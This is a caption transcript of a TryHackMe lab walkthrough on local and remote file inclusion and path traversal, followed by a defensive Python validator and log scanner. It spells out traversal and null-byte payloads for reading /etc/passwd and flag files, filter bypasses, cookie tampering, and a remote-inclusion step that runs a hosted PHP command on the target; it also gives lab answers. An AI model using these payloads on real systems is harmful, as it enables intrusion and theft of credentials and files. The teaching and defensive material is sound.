File Inclusion - TryHackMe Junior Penetration Tester 3.6

Captions
Hi, and welcome to our eighth lesson in TryHackMe's Junior Penetration Tester learning path. Last week we learned how to exploit and find insecure direct object references in a web application, giving us access to data that we shouldn't have. This lesson we're introducing file inclusion vulnerabilities, including local file inclusion (LFI), remote file inclusion (RFI), and directory traversal. It's gonna be a fun one, let's get to it.

So first things first, you want to go ahead and drop down into your Junior Penetration Tester learning dashboard. As you can see, we've already completed an introduction to pen testing, and we're now beginning our sixth lesson in Intro to Web Hacking. Go ahead and let's jump right into File Inclusion. I want to preface this by saying that if you're having connection problems, go ahead and look at my Content Discovery video, 2.2; I address some of those issues there and how you can get back online and reconnected. So I said just that: if you're continuing with this learning path, you may want to upgrade as well so that you aren't locked out. You'll pretty much be able to do as many rooms as you want, and you won't have to worry about waiting that 24 hours.

This room aims to equip you with essential knowledge to explain inclusion vulnerabilities, including local file inclusion, remote file inclusion, and directory traversal. Also, we will discuss the risk of these vulnerabilities if they're found and the required remediation. We provide some practical examples of each vulnerability as well as hands-on challenges. In some scenarios, web applications are written to request access to files on a given system, including images, static text, and so on, via parameters. Parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input. And here we can see a nice graph listing the URL and all the different parts of a URL: HTTP is going to be the protocol, the domain name is the first line of that URL, then we have our file name, which is
get.php. A question mark begins our query string, and that's where we get to the parameter, which in this case would be file, and then it equals whatever file they are looking for. For example, parameters are used with Google searching, where GET requests pass user input into the search engine. So you can see that q here marks the query, and the user input would be tryhackme; so this is someone doing a simple Google search for tryhackme. If you're not familiar with the topic, you can view the How the Web Works module to understand the concept. And here we go: How the Web Works is exactly what it sounds like. It's teaching you a little bit more about the World Wide Web, including DNS, HTTP, and how websites work together. I might add that to exploit a website it's good to know how one is created, so if you're interested, I encourage you to go ahead and check that out.

Let's discuss a scenario where a user requests to access files from a web server. First, the user sends an HTTP request to the web server that includes a file to display. For example, if a user wants to access and display their CV within the web application, the request may look as follows. And then here we have the protocol, HTTP; the domain name is webapp.thm; the file name, which is get.php; the query string begins with the question mark; and userCV.pdf is the required file to access. Here's a good look at a user requesting that PDF file from the web app that's going through the cloud or some server, and then the GET request is over here towards the application, and our app is linked to www, which represents the World Wide Web. If we go down, we can see that the CV is actually stored in the web application, so the user can request that PDF file.

Why do file inclusion vulnerabilities even happen? File inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications, such as PHP, that are poorly written and implemented. The main issue of these vulnerabilities is the input
validation, in which the user inputs are not sanitized or validated and the user controls them. When the input is not validated, the user can pass any input to the function, causing the vulnerability. Guys, this is going to be a recurring theme throughout your pen testing journey, which is that if you don't have input validation or sanitization, there's going to be a lot of problems that can occur.

What is the risk of file inclusion? It depends. If the attacker can use file inclusion vulnerabilities to read sensitive data, in that case the successful attack causes a leak of sensitive data, including code and files related to the web application and credentials for backend systems. Moreover, if the attacker somehow can write to the server, such as the /tmp directory, then it is possible to gain remote command execution (RCE). However, it won't be effective if a file inclusion vulnerability is found with no access to sensitive data and no writing ability to the server. No answer needed; let's continue to the next section.

To deploy the attack, deploy the attached VM to follow and apply the technique as well as do the challenges. In order to access this VM, please make sure to connect to the TryHackMe network via OpenVPN or access it directly from the AttackBox. Alright guys, I'm going to be using the AttackBox today. If you want to know how to use OpenVPN, and if you're having any connection issues, go ahead and watch my last video, 2.2, on Content Discovery. And we're just going to wait for the IP address to show up; it should take around 60 seconds. Okay, now that our IP has been populated and we have a new link, we're going to click on the AttackBox and start our machine up, and we'll wait for that IP address to show up; it should take around 60 seconds. Alright, our AttackBox is up and running. Let's go ahead and go full screen for a little bit, and once you've got this AttackBox up and running, go ahead and open a new web browser. Once you see the TryHackMe landing page, go ahead and copy that
link that was presented to us in task two and put it there at the top. You can't copy and paste, but all you have to do is just type the IP address: http:// and then the IP address, in my case it'd be 10.10.60.121, then a slash. And here we are, where you should see Local File Inclusion Vulnerability and Path Traversal.

Path traversal, also known as directory traversal, is a web security vulnerability that allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application's URL to locate and access files or directories stored outside the application's root directory. Path traversal vulnerabilities occur when the user's input is passed to a function such as file_get_contents in PHP. It's important to note that the function is not the main contributor to the vulnerability; often, poor input validation or filtering is the cause of the vulnerability. So you hear that, guys? It's not because of the user that's inputting, maybe not doing the best job; it's because of the developer, who actually created a system where there's no sanitization. In PHP, you can use file_get_contents to read the content of a file; you can find more information about the function here. Here we have a little more detailed information about that PHP function. As you can see, we have a string, a boolean, and that's about it. Then they have the parameters, the return values, and any errors or exceptions. They even give you examples; this one, written in PHP, will actually give you the output of a specific home page for a website.

The following graph shows a web application that stores files in /var/www/app. The happy path would be the user requesting the contents of userCV.pdf from a defined path, /var/www/app/CVs. So as you can see, the hacker is requesting from the web app and going all the way down into the directory of /etc, which contains the passwd file. The GET request goes to the app and then is
pushed all the way to the /etc folder, which then pops the passwd content back in visible plain sight. We can test out the URL parameter by adding payloads to see how the web application behaves. Path traversal attacks, also known as the dot-dot-slash attack, take advantage of moving the directory one step up using the double dots and then the forward slash. If the attacker finds the entry point, which in this case is get.php with a parameter of file, then the attacker may send something as follows: they'll take that file= and drill down into the directory to see if they can find anything that's worth any value. Suppose there isn't any input validation; instead of accessing the PDF files at the /var/www/app/CVs location, the web application retrieves files from other directories, which in this case is /etc/passwd. Each ../ entry moves one directory until it reaches the root directory, or simply /, then it changes the directory to /etc, and from there you can read the passwd file. If you're all familiar with a Linux system, you may see the similarities between this web server and a simple Linux system; there's really not too much that's different. We can see the root directory, which is indicated by a slash, and as we go down we go into /var/www/app and then the CVs folder. However, if someone was able to find this current path, and then instead of CVs they wanted to see maybe if there's a passwd file, they would be able to simply change the URL path and try and retrieve that passwd file. As a result, the web application sends back the file's content to the user.

Here we have the protocol, HTTP; the domain name is webapp.thm; then the file name is get.php. Remember that the question mark marks the beginning of our query string, then the file traverses the directory path all the way to boot.ini, or they can try Windows and go down into the win.ini file. The same concept applies here as with Linux operating systems, where we climb up directories until it reaches the root directory,
which is either C:\. Sometimes developers will add filters to limit access to only certain files or directories. Below are some common OS files you can use when testing; let's go ahead and check these out. So for the location /etc/issue, this contains messages or system identification to be printed before the login prompt. /etc/profile controls system-wide default variables, such as export variables, file creation mask (umask), terminal types, and mail messages to indicate when new mail has arrived. /proc/version specifies the version of the Linux kernel. /etc/passwd has all registered users that have access to the system; this is often sought after by hackers. /etc/shadow is also sought after by hackers, and it contains the information about the system users' passwords. /root/.bash_history contains the history commands for the root user; this could be good if you're doing some forensic investigation work and trying to figure out what commands the hacker used once they got into your system. /var/log/dmesg contains global system messages, including the messages that are logged during system startup. /var/mail/root is all the emails for the root user. /root/.ssh/id_rsa is the private SSH key for root or any known valid user on the server. /var/log/apache2/access.log is the access requests for the Apache web server. Last but not least, in the C: directory, C:\boot.ini contains the boot options for computers with BIOS firmware.

What function causes path traversal vulnerabilities in PHP? Did you get it? You remember that the function file_get_contents can actually cause directory traversal with PHP. Go ahead and copy that and paste it. There we go, pretty straightforward, if you want the contents: file_get_contents.

Task 4, Local File Inclusion (LFI). LFI attacks against web applications are often due to a developer's lack of security awareness. With PHP, using functions such
as include, require, include_once, and require_once often contributes to vulnerable web applications. In this room we'll be picking on PHP, but it's worth noting LFI vulnerabilities also occur when using other languages such as ASP, JSP, or even Node.js. LFI exploits follow the same concepts as path traversal. In this section, we will walk you through various LFI scenarios and how to exploit them. Suppose the web application provides two languages, and the user can select between the en and the ar. Here we can see the PHP code: the include function with GET lang. The PHP code above uses a GET request via the URL parameter lang to include the file of the page. A call can be done by sending the following HTTP request: http://webapp.thm/index.php?lang=en.php to load the English page, or ar.php to load the Arabic page, where the en.php and ar.php files exist in the same directory. That means there could be others. Theoretically, we can access and display any readable file on the server from the code above if there isn't any input validation. Let's say we want to read the /etc/passwd file, which contains sensitive information about the users of the Linux operating system. We can try the following: file=/etc/passwd. In this case, it works because there isn't a directory specified in the include function and no input validation. Now apply what we discussed and try to read the /etc/passwd file; answer question number one below.

Go back to your AttackBox or your VPN page and go ahead and click Lab 1. Let's go ahead and give it a try with welcome.php. We see that our current path is /var/www/html, and we can even see the content preview of welcome.php, indicating that there's really not any sanitization. For the passwd file, we do /etc/passwd, or p-a-s-s-w-d, and you can see the entire preview of the /etc/passwd file. We can see that there's mail, news, and different accounts and usernames that have passwords; it looks like also their user IDs and also permissions,
a whole slew of different directories and their permissions are released. Traditionally, in the /etc/passwd file, the first field is for the username, the second field is for the password, the third field is for the user ID, the fourth field is for the group ID, the fifth field is for any comments, the sixth field is for the group directory, the sixth field is for the home directory, and the seventh field is their login shell. So we take that /lab1.php, the question mark starting the query, and then the file= parameter, and then we can see that this would be /etc and this would be passwd. Go ahead and put that in: /etc/passwd. We've got it correct.

Alright guys, let's move on to number two. Next, in the following code, the developer decided to specify the directory inside the function: include languages, and then have the GET lang. In the above code, the developer decided to use the include function to call PHP pages in the languages directory only via the lang parameter. If there's no input validation, the attacker can manipulate the URL by replacing the lang input with other OS-sensitive files, such as /etc/passwd. Again, the payload looks similar to the path traversal, but the include function allows us to include any called files into the current page. The following will be the exploit. Here we have the exploit, which is: the protocol, HTTP; webapp.thm is the domain name; our file name is a PHP file; and then the question mark starts our query. After that we use the lang parameter, equals, followed by the specific directory we want, which is going to be /etc/passwd. Now apply what we discussed: try to read files within the server and figure out the directory specified in the include function. We're going to try to apply what we discussed and read the files within the server in lab number two. Go back to your home page, which includes all the different labs; it's just the IP address of the machine that you started. Go ahead and click lab number two and put the file in the input form below. If
we do /etc/passwd, we see the file content preview. If you're stuck, it's okay to take one of those hints. You can see one of the hints for this question is: try to enter an invalid input to check the error messages. Well, we've already done that, and this actually pops up a warning saying failed to open stream: no such file or directory in /var/www/html/lab2.php on line 26. So it's asking us, what is the directory specified in the include function? Well, as you can see from this error message, it failed opening includes/etc/passwd for inclusion, and the function was includes; it was including the includes function. That's why you want to include input validation.

Alright, let's go to task 5, Local File Inclusion number two. In this task we'll go a little bit deeper into LFI. We discussed a couple of techniques to bypass the filter within the include function. In the first two cases, we checked the code for the web app and then we knew how to exploit it. Checking the code is an important step; however, in this case, we're performing black-box testing, in which we don't have the source code. In this case, errors are significant in understanding how the data is passed and processed into the web app. In this scenario, we have the following entry point: http://webapp.thm/index.php?lang=en, which stands for English. If we enter an invalid input, such as THM, we get the following error: Warning: include(languages/THM.php): failed to open stream: no such file or directory in /var/www/html/THM-4/index.php on line 12.
The error message discloses significant information. By entering THM as input, the error message shows what the include function looks like, which is include(languages/THM.php). Look at the directory closely: we can tell the function includes files in the languages directory by adding .php at the end of the entry. Thus, the valid input will be something as follows: index.php? starts our query, lang=en, where the file en is located inside the given languages directory, named en.php. Also, the error message disclosed another important piece of information about the full web application directory path, which is /var/www/html/THM-4. To exploit this, we need to use the ../ trick, as described in the directory traversal section, to get out of the current folder. Let's try the following: http://webapp.thm/index.php?lang= and then ../../ until we reach the /etc/passwd file. Note that we used four ../ because we know the path has four levels: var, www, html, and then THM-4. But we still receive the following error: Warning: include(languages/ and then we have our forward slashes and dots with /etc/passwd.php): failed to open stream: no such file or directory in /var/www/html/THM-4/index.php on line 12. It seems we could move out of the PHP directory, but still the include function reads the input with .php at the end. This tells us that the developer specifies the file type to pass to the include function; we don't need to add .php if the developer made it automatic for us. To bypass this scenario, we can use the null byte, which is %00.
Using null bytes is an injection technique where URL-encoded representations, such as %00 or 0x00 in hex, with user-supplied data terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the null byte. By adding the null byte at the end of the payload, we tell the include function to ignore anything after the null byte, which may look like include(languages/ then we have our dots and forward slashes, the /etc/passwd file, but then we include our null byte, %00, then we have the .php), which is equivalent to include(languages/ and then all the way to the /etc/passwd file). And note that the %00 trick is fixed and not working with PHP 5.3.4 and above, which is why it's important to update and patch your web applications fast. Now apply what we showed in lab number three and try to read the /etc/passwd file by answering question number one below.

Okay, let's scroll down and give lab number three a try: to read /etc/passwd, what does the request look like? Well, let's go back to our machine, go back to home, and go to lab number three. Let's just do a simple /etc/passwd and see what kind of messages we get. Let's take the hint. Aha: don't trust the input form; insert it into the browser address bar. So we already know that it's most likely going to be /lab3.php?file= and now we have to figure out what parameter we're going to use to try and get that /etc/passwd file. Previously we found out that there's going to be four levels, so we'll go ahead and try ../../../../ (four slashes, eight dots). Then we can get rid of that, and we'll do /etc/passwd, and instead of just doing /etc/passwd, we're going to try a null byte and do %00 to pretty much ignore anything after that. Press enter, and we're given the /etc/passwd file. Nice job guys. Alright, we can go ahead and copy that as the answer to
question one there. Alright, number two. In this section, the developer decided to filter keywords to avoid disclosing sensitive information. The /etc/passwd file is being filtered; however, there are two possible methods to bypass the filter: first, by using the null byte, %00, or the current directory trick at the end of the filtered keyword, forward slash dot (/.). The exploit will be similar to the query lang=/etc/passwd/., but we could also use the query lang=/etc/passwd and then the null byte. To make it clear, if we try this concept in the file system using cd .., it will get you back one step; however, if you do cd and then just one dot, it stays in the current directory, much like a Linux system. Similarly, if we try /etc/passwd/.., it results in /etc, and that's because we move one to the root. Now if we try /etc/passwd and just one dot, the result will be /etc/passwd; we'll stay in the same place, since the dot refers to the current directory. Now apply this technique in lab number four and figure out how to read the /etc/passwd file.

So back in our attack machine, we'll go back to the home and lab number four, and the question is: which function is causing the directory traversal in lab number four? We'll go ahead and do /etc/passwd and see what comes up: you are not allowed to see a source file. So they know we're trying to look for those source files, and the developer has set up a precaution. So let's go ahead and do /etc/passwd and then /. (slash dot). If we press enter, we'll see that we are indeed staying in that same file and not jumping back, because we did a single dot. But when we do lang=/etc/passwd and give it a go, we get the warning that the file cannot be found, because there's no such file or directory in /var/www/html/lab4.php on line 29.
And the question is: which function is causing the directory traversal in lab number four? That would be the function file_get_contents. Boom, answer is correct.

This is number three. Next, in the following scenarios, the developer starts to use input validation by filtering some keywords. Let's test it out and check the error message. Assuming we go back to home, then go into lab 5, we'll try out the query lang= with our four slashes and dots, with /etc/passwd, and see what happens. We do lang=../../../../etc/passwd. We get a similar include error message, failing to open the stream because no such file or directory was found in the /var/www/html/lab5.php file. So if we check the warning message, in the include(languages/etc/passwd) section, we know that the web application replaces the ../ with the empty string. There are a couple of techniques we can use to bypass this. First, we can send the following payload to bypass: a series of four dots and two slashes for each directory that we're trying to hop; in this case it'll be one, two, three, four, five, and then followed by /etc/passwd. We can try that out now: ....//....//....//....// followed by /etc/passwd, and boom, there we go guys. So why did that work? This works because the PHP filter only matches and replaces the first subset string it finds and doesn't do another pass, leaving what is pictured below. So as you can see, we are putting in extra dots and slashes, because it automatically takes those things out, so we're left with a command of simply eight dots and four slashes, giving us the /etc/passwd file. We already tried that out in lab number five and read the /etc/passwd file, bypassing the filter.

Alright, number four. Finally, we'll discuss the case where the developer forces the include to read from a defined directory. For example, if the web application asks to
supply input that has to include a directory, such as the query lang=languages/en.php, then to exploit this we would need to include the directory in the payload, like so: ?lang=languages/ and then our ten dots and five forward slashes, followed by /etc/passwd. Try this out in lab number 6 and figure out what the directory has to be in the input field. We'll go back to home and go to the last lab, number six. So we'll do ?lang=languages/../ one, two, three, four, five, and /etc/passwd, and see what that brings up. This is a case of giving us too much feedback that a hacker can actually use to try and get into the system: it says access denied, allowed files at THM-profile. This is the folder that we're going to need to include to perform our attack. Go ahead and put THM-profile; that's the correct answer. Right on, lab number six, and read /etc/os-release; what is the VERSION_ID value? So as you can see right here, if you look closely, it says for example THM-profile/tryhackme.txt. So we'll do THM-profile and then /etc/os-release. Go ahead and hit that. So instead of the languages directory we're going to use THM-profile, so we'll do ?lang= and then we will do THM-profile and then /etc/os-release and see what that brings out. One, two, three, four, five, then we'll do /etc, and instead of passwd we're gonna do /os-release, and Bob's your uncle: we have just found the OS release. As you can see, the VERSION_ID is 12.04, so we'll go ahead and copy that and bring it back over. Let's keep chugging ahead; I'm going to task six, Remote File Inclusion.

Remote file inclusion is a technique to include remote files into a vulnerable application. Like local file inclusion, RFI occurs when improperly sanitizing user input, allowing an attacker to inject an external URL into include functions. One requirement for RFI is that the allow_url_fopen
option needs to be on. The risk of remote file inclusion is higher than local file inclusion, since remote file inclusion vulnerabilities allow an attacker to gain remote command execution (RCE) on the server. Other consequences of a successful remote file inclusion attack include sensitive information disclosure, cross-site scripting, and denial of service. An external server must communicate with the application server for a successful RFI attack, where the attacker hosts malicious files on their server; then the malicious file is injected into the include function via HTTP requests, and the content of the malicious file executes on the vulnerable application server. As you can see, the hacker sends out a request with a remote URL, http://attacker.thm, with their malicious executable that gets sent to the server in a GET request, and so the text file is sent back from the server to the web application, which injects the content of that cmd.txt into the include function before executing that function. Those results are sent back to the hacker within the get.php page. We can see the cmd.txt file here: just simply Hello THM.

Remote file inclusion steps. The following figure is an example of steps for a successful RFI attack. Let's say that the attacker hosts a PHP file on their own server, attacker.thm/cmd.txt, where cmd.txt contains a printing message, Hello THM. First, the attacker injects the malicious URL, which points to the attacker's server, such as the query lang= and then the URL leading to their file. If there is no input validation, then the malicious URL passes into the include function. Next, the web server will send a GET request to the malicious server to fetch the file. As a result, the web app includes the remote file into the include function to execute the PHP file within the page and sends the execution content to the attacker. In our case, the current page somewhere has to show the Hello THM message. Visit the following lab URL to try an RFI attack; so you
can follow the link that's presented back in your AttackBox, or you can simply go to home, and there should be a playground button or tab. So as you can see, we're here in the playground; you can pretty much try any technique that you want. I actually tried going ahead and using their same cmd.txt to see if anything would happen; turns out that there was just an error there, but I was able to find that there was an include function. You can simply do the /etc/passwd file. Go ahead and click complete.

Alright, now it's time to gain RCE in the lab playground with remote file inclusion to execute the hostname command. Let's go back to the main page and go to playground. So remote file inclusion is basically a reverse shell, right? It's redirecting the web server to download a malicious file that may execute on the target machine. If you've never executed a remote shell before, boy, are you in for a treat. It'll look something like http:// and then the IP address, /playground.php, then the question mark for our query, and we'll do file=http:// leading to the file on our web server. Now the include function will make the request to shell.php, download it, and execute it on the target; that's the danger of include functions. Open up a new terminal window and start a web server; you can do this by doing sudo python3 -m http.server. You can click this little S for Sublime Text, and it'll open up a new notepad for you. We can actually create our own executable, so we're going to write this in PHP and simply do print exec, and we're going to do hostname; so this is just going to basically tell us the hostname if this is successful, if it is downloaded and executed on the web application. Then we'll do a question mark and another bracket to close it, and that's it. You can save that in the default root directory as cmd.txt. Go ahead and save and close, and take note of our IP address; this is what the web server is going to connect to after we send this. So we're going to copy that, and in the
playground put in http:// then the attack machine IP, and then /playground.php, start our query, file=, and now it's time to put in the URL to our web server. This is going to be http:// and then your IP address. If you don't know your IP address, you can simply go into the command line and check it out right here, or you can run the command ifconfig. Make sure that those are periods between each number, and then a colon for the port; we're going to use port 8000, forward slash cmd.txt. And it was successful. You guys have just now run your first remote file inclusion. We're going to copy that hostname, and that'll be our answer.

As a developer, it's important to be aware of web application vulnerabilities, how to find them, and prevention methods. To prevent the file inclusion vulnerabilities, some common suggestions include:

1. Keep systems and services, including web application frameworks, updated with the latest version.
2. Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information.
3. A web application firewall, or WAF, is a good option to help mitigate web application attacks.
4. Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them; don't use them, such as allow_url_fopen and allow_url_include.
5. Carefully analyze the web application and allow only the protocols and PHP wrappers that are needed.
6. Never trust user input, and make sure to implement proper input validation against file inclusion.
7. And lastly, implement whitelisting for file names and locations as well as blacklisting.

It's all about that input validation, guys; it'll keep your web application secure. Go ahead, yeah, we can move to our final task if you're up for it.

Task 8, Challenge. Great job! Now apply the techniques you've learned to capture the flags. Familiarizing yourself with HTTP web basics could help complete these challenges. Make sure
the attached VM is up and running then visit the URL challengesindex.php we're going to go over here to our URL and instead of playground we're going to go to challenges slash index.php all right we've made it to the file collusion lab challenges looks like there's three of them we will click challenge number one steps for testing for local file inclusion find an entry point that could be via get post cookie or HTTP header values the input form is broken you need to send post requests with file parameter we'll go ahead and try simple welcome.php and it returns nothing looks like it's broken if we look at the hint for question one it says change the form method to post in the page Source or use a tool like burp to modify the method of the request post and click in here and go to inspect element form starts right here and the method is get so ideally we would go in here and change this to post and then put in this specific file we're looking for which in this case happens to be Etc flag one but it can be a little tricky in the web developer tool so you can also use two tools like burp sweep or just do it from the command line open up a new terminal box and type in curl which just stands for client URL you're basically just an information a website see what kind of response would come back so in this case Dash X for request command and then we're going to do Post which is the method and then we're going to type in the URL for me that's HTTP colon slash n.10.122.123 slash challenges slash Channel One Dot PHP just the same IP address as the one they give you over here and then you can actually go back and it says challenges channel1.php so we'll go into that web page back to the terminal.1.php and we're going to do Dash D for data single tag method equals get and Ampersand file equals and then type in the name of the file slash Etsy slash flag one another single tack to enclose that so essentially this is going to show us what it would look like we could actually post 
that file because as the form is broken we're actually going to use the command line to see what would the response be well go ahead and press enter and as you can see final content preview of etsy flag one is right here we have the flag so we can go ahead and copy that put it in you've captured the first flag for the challenge nice job guys that was a little tricky and not obvious especially for beginners all right now that we've captured that flag let's go to challenge number two it says refresh the page please so we'll go ahead and refresh the page welcome guest only admins can access this page well let's go ahead and open a tool called burp Suite all you have to do is go to web and click burp Suite Community Edition group tweet is going to be your best friend when you're trying to pen test web applications go ahead and click temporary project and start burp if we look at the hint for captured flag 2 we can see it says check your cookies burp Suite is actually really good at doing this if we go into proxy let's open a browser and once you've got burp Suite up and running ahead and click burp on this foxy proxy icon up in the right hand corner foxyproxy is the action extension that allows burp Suite to see all the traffic in Iraq with the web pages that we see in our web browser so after you do that go ahead and refresh the page you should be able to see in burp Suite get request that was submitted to either get challenges challenge two everything that looks good we see here that there's an option called cookie and guess what we can change that let's go ahead and change that to admin if you want to forward that to the webpage just go ahead and click forward now let's see what happens back to your web browser check it out and there we go it says welcome ad this is the admin webpage get the flag so it looks like we have a couple more steps to do and refresh the page then go to burp Suite we should be able to see the request again instead of just doing admin let's 
try getting the flag to slash Etc flag 2 which according to over here is the file that we're trying to get so we go ahead and forward that well it looks like there was a couple error messages first off we can see that there's two forward slashes means that this include function adds an extra forward slash and it looks like extension for DOT PHP we can fix that in burp Suite go ahead and refresh the page go back to burp suite and get rid of guests and put just BTC without the forward slash slash flag two and then to get rid of that extension we'll do percent and to get rid of that extension we'll use something that we learned about in this lesson called a null byte percent zero zero and we'll go ahead and forward that back to the web browser and boom it looks like everything is looking a lot better looking for exactly the file that's wanted remove the extra slash and gotten rid of that extension however now it's time to tie all these things together use what's called directory traversal looks like it's not getting to the root directory so give it one more refresh go back to burp Suite we're going to go up four levels so do dot dot slash dot dot slash dot dot slash dot dot slash that should take us to the root folder where we can go to Etsy and flag two then add the note bite and go ahead and forward that go back to the web browser and we'd begin the flag the cookie is yummy go ahead and claim the loot and you can paste that over in the answer box for flag two guys once again a little Advanced but burp Suite is something that you'll be using more and more in these lessons all right let's go to Challenge three so include a file in the input form below it's expecting a welcome so let's go ahead and do but well met alright so our current path equals the directory VAR dub dub dub html3.php is what handles the form viewing files under the same directory although similar to the last challenge depending the dot PHP extend to the input so we're going to go up to the URL 
where our query starts we're going to go file equals then we're going to do some direct return reversal with four levels dot dot slash dot dot slash dot dot slash dot dot slash Etc flag three and then we're going to add a null byte so that maybe that extension will go away click in the error shows that the slash has vanished between flag and Etc but also the dot PHP extension remains this is good sign for the web developer it means that they're probably using some kind of sanitization we're going to change the url again only this time we're going to add two more dots one slash four and then press enter we're still getting that error well if we check out the hint we can see that not everything is filtered the website uses dollar sign underscore requests to accept HTTP requests I know let's go back to the command line and try curling it and open up a command line I'm going to do curl x and we're going to do the post method with and then the URL for me it's going to be 10.10.14.3 slash challenges slash child three PHP and then we'll do Dash D for data and we're gonna do attack method equals post and file equals dot dot dot dot slash slash dot dot dot dot slash and dot dot dot dot slash and Etc flag three and they will add the note byte we'll do a closing tag and we'll do dash dash output in another Dash and we'll see if it works click enter oh look at that post work include function is trying to request a file and there's no chain which means we don't need to add any extra slashes or dots just needed to change the request method from get to post so in that case we'll do curl and then we'll get rid of these extra slash within dots three and we'll give it a go Aha and the final content preview of flag three is post is working way to go guys nice job working your way through go ahead and copy that put it as an answer for flag three you guys just finished file inclusion lesson I'm so happy for you guys I'm glad that you stuck around just to be clear it looks like there's 
no filtering in the application all we need to do is change the method to post however when we're looking at the web application it doesn't exactly tell us to do that a lot of times as a pen tester it'll be up to your own intuition to try and discover that for yourself in fact we may be able to do this just by changing the method and actually getting rid of all the directory traversal dots and slashes all that we'll need is slash Etc and slash flag with the null button and there we go nice we may not even need the nobody let's try it out nope I guess you do need it I want to remind you guys that it's going to learn more of these Concepts they're going to become more powerful that means more responsibility for us as penetration testers because with great power comes great responsibility
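The remediation list in the video (never trust user input, allowlist file names and locations, block remote URLs) and the three challenges (directory traversal, the %00 null byte, an include that appends .php) map directly onto two defender-side pieces of code. The block below is an added example written for this page; it is not code from the video, from TryHackMe, or from the lab application. It assumes a hypothetical document root `/var/www/html/pages` with an allowlist of page names, and a few constructed Apache-style access-log lines that reproduce the request shapes seen in the walkthrough. `resolve_page` is the validation an include handler should do before touching the filesystem; `scan_log` is the detection side, tagging requests that carry traversal sequences, null bytes, remote-include URLs or sensitive paths.

```python
"""Added example: allowlist-based validation of a 'file' parameter, plus a
log scanner for the traversal / null-byte / RFI patterns discussed above.
DOC_ROOT, ALLOWED_PAGES and SAMPLE_LOG are assumptions constructed for this
example, not values from the lab."""
import os
import re
from urllib.parse import unquote

DOC_ROOT = "/var/www/html/pages"          # hypothetical include root
ALLOWED_PAGES = {"welcome", "about", "contact"}  # hypothetical allowlist

SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")  # http://, ftp://, ...
NAME_RE = re.compile(r"[a-z0-9_]+")                      # bare page names only


def resolve_page(file_param: str):
    """Return the absolute path the handler may include, or None to reject.

    Implements remediation items 6 and 7: decode once, refuse null bytes and
    URL schemes (RFI), strip the expected .php suffix, require a plain name
    that is on the allowlist, and finally confirm the resolved path still
    sits under DOC_ROOT (defence in depth against traversal)."""
    raw = unquote(file_param)
    if "\x00" in raw:            # %00 truncation trick from challenges 2/3
        return None
    if SCHEME_RE.match(raw):     # remote file inclusion attempt
        return None
    name = raw[:-4] if raw.endswith(".php") else raw
    if not NAME_RE.fullmatch(name) or name not in ALLOWED_PAGES:
        return None              # dots, slashes, unknown pages: all rejected
    root = os.path.realpath(DOC_ROOT)
    candidate = os.path.realpath(os.path.join(root, name + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None              # escaped the root somehow: reject
    return candidate


# Detection rules: each is checked against the raw and the URL-decoded line.
SUSPICIOUS = [
    ("traversal", re.compile(r"\.\./|\.\.\\|\.\.%2f|%2e%2e%2f", re.I)),
    ("null-byte", re.compile(r"%00|\x00")),
    ("remote-include", re.compile(r"[?&]file=[a-z][a-z0-9+.-]*://", re.I)),
    ("sensitive-path", re.compile(r"/etc/(passwd|shadow|flag\d*)", re.I)),
]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Mar/2023:10:00:01 +0000] "GET /playground.php?file=welcome.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Mar/2023:10:00:02 +0000] "GET /playground.php?file=../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [24/Mar/2023:10:00:03 +0000] "GET /challenges/index.php HTTP/1.1" 200 800',
    '10.0.0.9 - - [24/Mar/2023:10:00:04 +0000] "GET /playground.php?file=http://10.0.0.9:8000/cmd.txt HTTP/1.1" 200 64',
    '10.0.0.9 - - [24/Mar/2023:10:00:05 +0000] "POST /challenges/index.php HTTP/1.1" 200 300',
    '10.0.0.9 - - [24/Mar/2023:10:00:06 +0000] "GET /playground.php?file=..%2F..%2F..%2Fetc%2Fflag1%00 HTTP/1.1" 200 40',
]


def scan_log(lines):
    """Return [(client_ip, [tags...])] for every line matching a rule.

    Matching is done on both the raw line and its URL-decoded form so that
    encoded traversal (%2e%2e%2f) and encoded null bytes are not missed."""
    hits = []
    for line in lines:
        decoded = unquote(line)
        tags = [name for name, rx in SUSPICIOUS
                if rx.search(line) or rx.search(decoded)]
        if tags:
            hits.append((line.split()[0], tags))
    return hits


if __name__ == "__main__":
    for param in ("welcome.php", "../../../../etc/passwd",
                  "http://10.0.0.9:8000/cmd.txt", "/etc/flag2%00"):
        print(f"{param!r:40} -> {resolve_page(param)}")
    for ip, tags in scan_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(tags)}")
```

The allowlist does the real work: once the handler only ever builds a path from a name it already knows, the traversal, null-byte and .php-suffix games in the challenges have nothing to act on, and the `realpath` check is a second line of defence rather than the first. On the detection side, alerting on the decoded line matters because the third challenge shows the same payload arriving with different encodings and methods; the scanner does not care whether the parameter came by GET or POST, only what it contained.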
Info
Channel: Brock Hard Security
Views: 5,246
Keywords: tryhackme, penetration testing, pentester, how to, lesson 8, introduction, web hacking, beginner, free course, ethical hacking, cybersecurity, cyber security, how to hack, hacking tutorial, junior, free, training, what is file inclusion, file inclusion, file inclusion example, finding file inclusion in, deploy the vm, path traversal, directory traversal, local file inclusion, lfi, lfi#2, lfi #2, remote file inclusion, rfi, rce in lab, remediation, challenge, answers, explained, walkthrough
Id: Qt6L6q17TZ4
Length: 44min 2sec (2642 seconds)
Published: Fri Mar 24 2023